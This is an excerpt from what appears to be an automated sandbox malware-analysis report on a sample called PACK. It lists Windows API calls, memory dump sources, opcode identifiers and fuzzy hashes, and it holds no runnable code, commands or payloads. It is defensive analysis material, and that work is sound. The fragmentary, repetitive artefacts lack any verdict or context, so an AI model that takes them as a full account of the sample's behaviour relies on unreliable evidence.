                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                              • Opcode ID: baa59061897ef881c67fe2b4e391d4392ef7771c60ca79d07c63c5e96dffabb0
                                                                                                                                              • Instruction ID: 3a6387a25d3f5b8602bc45ba5a0b9e3f30c27fc0c3121beff6dd2652aa9af940
                                                                                                                                              • Opcode Fuzzy Hash: baa59061897ef881c67fe2b4e391d4392ef7771c60ca79d07c63c5e96dffabb0
                                                                                                                                              • Instruction Fuzzy Hash: 1601F9707602416FD734DE2AEC4876B73D9AB84318F90863FB142C76C0DA70DC58C611
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(000000FF,?,?,?), ref: 002E9957
                                                                                                                                              • GetLastError.KERNEL32 ref: 002E9964
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                              • Opcode ID: 6db26deb168b8233862b4804dd757ce2c0b5d67aa82abeb971d511eb2547c531
                                                                                                                                              • Instruction ID: ea201ca3c40f55f4448ba8efaaf606c50ec68f44cb027327c2cc96def6f26d66
                                                                                                                                              • Opcode Fuzzy Hash: 6db26deb168b8233862b4804dd757ce2c0b5d67aa82abeb971d511eb2547c531
                                                                                                                                              • Instruction Fuzzy Hash: 5301D8722701829B8F19CE278C846BF776DAF45330785461FED26CB252DB71DCB19660
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 00307B99
                                                                                                                                                • Part of subcall function 00307A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,003200E0,002ECB18,?,?,?,?,?,?), ref: 00307BD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap$_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1482568997-0
                                                                                                                                              • Opcode ID: 4c858ef21aaecd5677c4a8b539b81e065923165b654e4491f20659b349860eed
                                                                                                                                              • Instruction ID: 8a73cef2cc32af43f7f348a8226d3f442638815fffaa5e485b8ed65d7fef1d3e
                                                                                                                                              • Opcode Fuzzy Hash: 4c858ef21aaecd5677c4a8b539b81e065923165b654e4491f20659b349860eed
                                                                                                                                              • Instruction Fuzzy Hash: 52F06231E0B1156ADB233A259C65F6F3B5C9F81BB0F164156FC18AA1D0DB70F80091A1
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 002F0581
                                                                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 002F0588
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                              • Opcode ID: 3900bfe5114c275a12876eb89e06c38ff828f7784393f8fdb4b567bbeda507aa
                                                                                                                                              • Instruction ID: 336a90a90467991f8f8715e402c5b4b5c843a5bc5a0d8be2627dc283ab790bb5
                                                                                                                                              • Opcode Fuzzy Hash: 3900bfe5114c275a12876eb89e06c38ff828f7784393f8fdb4b567bbeda507aa
                                                                                                                                              • Instruction Fuzzy Hash: A9E09B72E2020EA75F158AA59C458FBB39DF64C381B505179EA02D3301F974DD254BA4
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0030ABA6: GetEnvironmentStringsW.KERNEL32 ref: 0030ABAF
                                                                                                                                                • Part of subcall function 0030ABA6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030ABD2
                                                                                                                                                • Part of subcall function 0030ABA6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0030ABF8
                                                                                                                                                • Part of subcall function 0030ABA6: _free.LIBCMT ref: 0030AC0B
                                                                                                                                                • Part of subcall function 0030ABA6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030AC1A
                                                                                                                                              • _free.LIBCMT ref: 00306FB3
                                                                                                                                              • _free.LIBCMT ref: 00306FBA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 400815659-0
                                                                                                                                              • Opcode ID: b31e8856ebe9d72aba45e1e6c9a0ab3430c45a85764d327756ec2196f1f81893
                                                                                                                                              • Instruction ID: 86bb0a665b906892a01de1f08c04b529c3113b87edaeeb83ec24222c3bd5f627
                                                                                                                                              • Opcode Fuzzy Hash: b31e8856ebe9d72aba45e1e6c9a0ab3430c45a85764d327756ec2196f1f81893
                                                                                                                                              • Instruction Fuzzy Hash: ACE02B3BB0F9520BD627363D3C3362F1A884BC1374F12221AFA10DF1C7DD6099220096
                                                                                                                                              APIs
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,002E9F65,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002EA143
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002E9F65,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002EA174
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 4cfacc1480f2c8580a42f10296c29697be98414c050312bbb0aba84be94465d3
                                                                                                                                              • Instruction ID: a6904825a72b0c3821fcd2f7081f130c5ed300be46231a1872e959d2dc2bc343
                                                                                                                                              • Opcode Fuzzy Hash: 4cfacc1480f2c8580a42f10296c29697be98414c050312bbb0aba84be94465d3
                                                                                                                                              • Instruction Fuzzy Hash: 00F0A03119018EABDF025F61DC01BEA77ACAB09381F848061BC8C86160DB72DAB9EA50
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemText_swprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3011073432-0
                                                                                                                                              • Opcode ID: 45d942699ae9fe2c133d76463c4ed52db7d966a09464c5265e7149460d45aa66
                                                                                                                                              • Instruction ID: 39986a3ecb8456f6b2212b3ebe8ebbee05609664ea586b89f0b6bfa10d2aa6fc
                                                                                                                                              • Opcode Fuzzy Hash: 45d942699ae9fe2c133d76463c4ed52db7d966a09464c5265e7149460d45aa66
                                                                                                                                              • Instruction Fuzzy Hash: 42F0EC7156434C26DB12EB70DC07FA97B1D9B05781F5404B5BB05520A2D5716B314B61
                                                                                                                                              APIs
                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,002E9648,?,?,002E94A3), ref: 002E9E29
                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,002E9648,?,?,002E94A3), ref: 002E9E57
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4033686569-0
                                                                                                                                              • Opcode ID: 70b4e61ff505745e8cdf0ff5307b6a8b353f35fdcf1bcbc9d5d68278688cb199
                                                                                                                                              • Instruction ID: 345053e21d8f2779efa6d0328f6217b45ca954d30bbf5f9bfb959bfd28bf3b44
                                                                                                                                              • Opcode Fuzzy Hash: 70b4e61ff505745e8cdf0ff5307b6a8b353f35fdcf1bcbc9d5d68278688cb199
                                                                                                                                              • Instruction Fuzzy Hash: 55E092315912496BDB029F61DC45FEA775CAB0C3C1FC880A3B988C2152DB71DDF5EA60
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,002E9E74,?,002E74F7,?,?,?,?), ref: 002E9E90
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,002E9E74,?,002E74F7,?,?,?,?), ref: 002E9EBC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 0d07ec7cd0e165d132deb46761f9da7cdfa21e27af616417cc78a6d0dc3de2a7
                                                                                                                                              • Instruction ID: 472b6ad2bdb79212072e8a2f884fb700252f80d9d3f4ecbe0c294d89d4ec78ff
                                                                                                                                              • Opcode Fuzzy Hash: 0d07ec7cd0e165d132deb46761f9da7cdfa21e27af616417cc78a6d0dc3de2a7
                                                                                                                                              • Instruction Fuzzy Hash: 35E09B315101585BCB12AB65DC05BEAB75C9B0C3E1F4443A2FE58D3291D7709DA5CBD0
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002EFD18
                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,002EE7F6,Crypt32.dll,?,002EE878,?,002EE85C,?,?,?,?), ref: 002EFD3A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                              • Opcode ID: 9a32d855160dc331d1849b498baee9d3565e21e54654f9b937a9434089e09d89
                                                                                                                                              • Instruction ID: de49566a6c46fad47590766b20a1f90a4bf59d128e0be01607789b8f3267b01c
                                                                                                                                              • Opcode Fuzzy Hash: 9a32d855160dc331d1849b498baee9d3565e21e54654f9b937a9434089e09d89
                                                                                                                                              • Instruction Fuzzy Hash: D5E0127691015C6ADB119A959C08FEB776CEF0D391F4440A5B948D2004DA74E964CBA0
                                                                                                                                              APIs
                                                                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,00311161,000000FF), ref: 002F9B31
                                                                                                                                              • CoUninitialize.COMBASE(?,?,?,00311161,000000FF), ref: 002F9B36
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3856339756-0
                                                                                                                                              • Opcode ID: e6adbb098eb6ec3be3f7fe1478d1489cb2b705a7462727afc3ebc20d3bcee99b
                                                                                                                                              • Instruction ID: 3ee119fe0ef7de6224c641983385131fe29123b7f95e28076c5f911ab513308e
                                                                                                                                              • Opcode Fuzzy Hash: e6adbb098eb6ec3be3f7fe1478d1489cb2b705a7462727afc3ebc20d3bcee99b
                                                                                                                                              • Instruction Fuzzy Hash: 5DE01A32558654AFC721DB48DC46B96F7A8FB0DB20F004769F91A83B50CB756800CA91
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0030281A: try_get_function.LIBVCRUNTIME ref: 0030282F
                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00301744
                                                                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0030174F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 806969131-0
                                                                                                                                              • Opcode ID: f9ea3f9fd40765439c8527d11419e98a5fcf09deaa825d01a39fa876eaaf6f0f
                                                                                                                                              • Instruction ID: 7ab9d54ef5ec09406c70b79c3501f850495343604e64ccb14d7f436312af7b85
                                                                                                                                              • Opcode Fuzzy Hash: f9ea3f9fd40765439c8527d11419e98a5fcf09deaa825d01a39fa876eaaf6f0f
                                                                                                                                              • Instruction Fuzzy Hash: BDD0A928A5730108CE0B2AB4683288A178C8812F703F08A46F0208E4C2EA7080026229
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemShowWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3351165006-0
                                                                                                                                              • Opcode ID: 26c212d0834ab942abc41aeb5287d664e933fc761fa8f5af89419e99ac8b0184
                                                                                                                                              • Instruction ID: c6d6ae32bac499b8c46cdc887472c78d87a7ccee56916865013ca3281ad63baf
                                                                                                                                              • Opcode Fuzzy Hash: 26c212d0834ab942abc41aeb5287d664e933fc761fa8f5af89419e99ac8b0184
                                                                                                                                              • Instruction Fuzzy Hash: EEC01272058210BECB021BB0DC09D6EBBACABAA312F06C908B0A6C00A0C238C220DB11
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 002E12A2
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 002E12A9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherItemUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4250310104-0
                                                                                                                                              • Opcode ID: 60799a795a51ff76ddcad295050f671e301cb1ea13517d322612a7724087f154
                                                                                                                                              • Instruction ID: c34fca660d2037586e34755815d6a41b1c61ac34a2ac563c850f228712b579b9
                                                                                                                                              • Opcode Fuzzy Hash: 60799a795a51ff76ddcad295050f671e301cb1ea13517d322612a7724087f154
                                                                                                                                              • Instruction Fuzzy Hash: D7C04C76408250BFCB025BA09C08D6FBFADAB9D312F05C809B1A680024C7358621DB11
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                              • Opcode ID: 343ca2f9bfbbec8a658b1908b958e65530a81756a0e304d8126a2fbf7f50138a
                                                                                                                                              • Instruction ID: 11d5fb1ea800ab0e153869781f281ce0b58e4512b485c1e68df88273f173fa18
                                                                                                                                              • Opcode Fuzzy Hash: 343ca2f9bfbbec8a658b1908b958e65530a81756a0e304d8126a2fbf7f50138a
                                                                                                                                              • Instruction Fuzzy Hash: B7B1D170AA06C6AFEB28CF76C484BB9FBA5BF05304F940279E455C7281D770A974CB91
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E81C9
                                                                                                                                                • Part of subcall function 002E137D: __EH_prolog.LIBCMT ref: 002E1382
                                                                                                                                                • Part of subcall function 002E137D: new.LIBCMT ref: 002E13FA
                                                                                                                                                • Part of subcall function 002E1973: __EH_prolog.LIBCMT ref: 002E1978
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
